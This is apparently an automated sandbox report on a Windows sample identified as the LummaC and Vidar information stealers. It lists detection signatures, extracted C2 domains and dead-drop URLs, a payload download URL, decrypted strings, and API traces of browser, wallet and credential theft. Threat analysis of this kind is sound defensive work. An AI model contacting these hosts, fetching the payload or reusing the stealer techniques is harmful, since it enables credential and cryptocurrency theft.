Windows Analysis Report
T2bmenoX1o.exe

Overview

General Information

Sample name: T2bmenoX1o.exe
renamed because original name is a hash value
Original sample name: a72af6c3293eb3061bba1e48ba6147de.exe
Analysis ID: 1528576
MD5: a72af6c3293eb3061bba1e48ba6147de
SHA1: 316276ac440f65361db52e49a7fc4d2a9be1f457
SHA256: 7dc3d6e633cbabe95c39fa36f94ab6657e3c04dab7a9a6c1f79c9e2424378e00
Tags: 32exe
Infos:

Detection

LummaC, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: T2bmenoX1o.exe Avira: detected
Antivirus detection for URL or domain
Source: https://steamcommunity.com/profiles/76561199724331900 URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe Avira: detection malicious, Label: HEUR/AGEN.1310458
Source: C:\ProgramData\AAFIIJDAAA.exe Avira: detection malicious, Label: HEUR/AGEN.1310458
Found malware configuration
Source: 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/maslengdsa"], "Botnet": "4a5bc8b73e12425adc3c399da8136891"}
Source: 8.2.AAFIIJDAAA.exe.1b0000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["frizzettei.sbs", "invinjurhey.sbs", "exemplarou.sbs", "isoplethui.sbs", "wickedneatr.sbs", "laddyirekyi.sbs", "bemuzzeki.sbs", "exilepolsiy.sbs"], "Build id": "H8NgCl--"}
Multi AV Scanner detection for domain / URL
Source: cowod.hopto.org Virustotal: Detection: 10% Perma Link
Source: nsdm.cumpar-auto-orice-tip.ro Virustotal: Detection: 8% Perma Link
Source: exemplarou.sbs Virustotal: Detection: 6% Perma Link
Source: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe Virustotal: Detection: 10% Perma Link
Source: http://cowod.hopto.org Virustotal: Detection: 10% Perma Link
Source: exemplarou.sbs Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for submitted file
Source: T2bmenoX1o.exe Virustotal: Detection: 44% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\AAFIIJDAAA.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: T2bmenoX1o.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: wickedneatr.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: invinjurhey.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: laddyirekyi.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: exilepolsiy.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: bemuzzeki.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: exemplarou.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: isoplethui.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: frizzettei.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: exemplarou.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: - Screen Resoluton:
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: - Physical Installed Memory:
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: Workgroup: -
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: H8NgCl--
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree, 1_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00411E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 1_2_00411E32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040A7AD _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA, 1_2_0040A7AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB66C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 1_2_6CB66C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCBA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 1_2_6CCBA9A0
Uses 32bit PE files
Source: T2bmenoX1o.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:51295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:51299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:51376 version: TLS 1.2
Source: T2bmenoX1o.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2257843409.000000006CBCD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000001.00000002.2249159673.0000000038339000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000001.00000002.2244107241.000000002C45F000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr
Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2257843409.000000006CBCD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DC9ABF FindFirstFileExW, 0_2_00DC9ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00416013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 1_2_0041547D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00409CF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 1_2_00414D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040D59B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0040B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0040BF22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040B914
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 1_2_00415B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0040CD0C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001C9ABF FindFirstFileExW, 8_2_001C9ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 1_2_00415182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 0_2_00DDE385
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 0_2_00DDE385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 1_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 1_2_004014AD
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx ebx, word ptr [ecx] 8_2_00208051
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 8_2_0020A0B9
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 8_2_001F82E8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 8_2_0021E318
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_001FA3BF
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh 8_2_002243F8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 8_2_00218528
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx ecx, word ptr [edi+eax] 8_2_002245E8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00222601
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, ebx 8_2_001F264D
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_0020665F
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_0020A687
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 8_2_002207F8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_00210813
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp dword ptr [0044FDB4h] 8_2_001F2849
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 8_2_001FA86A
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h 8_2_001FC89C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 8_2_002268A8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp eax 8_2_001EE914
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 8_2_0021093D
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 8_2_001E2928
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp eax 8_2_001EE9A5
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 8_2_00226A38
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+000006B8h] 8_2_001FAA47
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 8_2_001EEAC6
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 8_2_00204AD8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_00210B22
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh 8_2_0021CB36
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_00210B43
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_001ECB78
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00226BB8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 8_2_00226BB8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_0020AC81
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_00204D38
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00202D48
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 8_2_001EED6B
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx ecx, word ptr [ebp+00h] 8_2_001E8D88
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_0021CE48
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp ecx 8_2_00222EAE
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [edx], 0000h 8_2_001FCEB7
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h 8_2_00224E98
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00224E98
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp eax 8_2_00206EC4
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh 8_2_0020CF30
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 8_2_00210F18
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+14h] 8_2_00210F18
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 8_2_00220F18
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp ecx 8_2_00222F6C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 8_2_001F0F6F
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [eax], dx 8_2_001FF138
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [esi], ax 8_2_001FF138
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov ebp, eax 8_2_001E71D8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 8_2_0020F2B8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh 8_2_00223290
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 8_2_002093AF
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh 8_2_00223390
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 8_2_001F340E
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_0020B56A
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [eax], dx 8_2_001FF540
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_002236C7
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h 8_2_00205824
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h 8_2_00223833
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 8_2_001E1878
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 8_2_00221918
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 8_2_0020DA58
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h 8_2_0020BB20
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [edx], ax 8_2_00207B69
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp eax 8_2_00207B48
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h 8_2_00209BA8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00209BA8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h 8_2_00209BA8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp eax 8_2_00205C1B
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00225C62
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 8_2_001F3CBA
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov edi, ecx 8_2_001F1D02
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 8_2_001E3D78
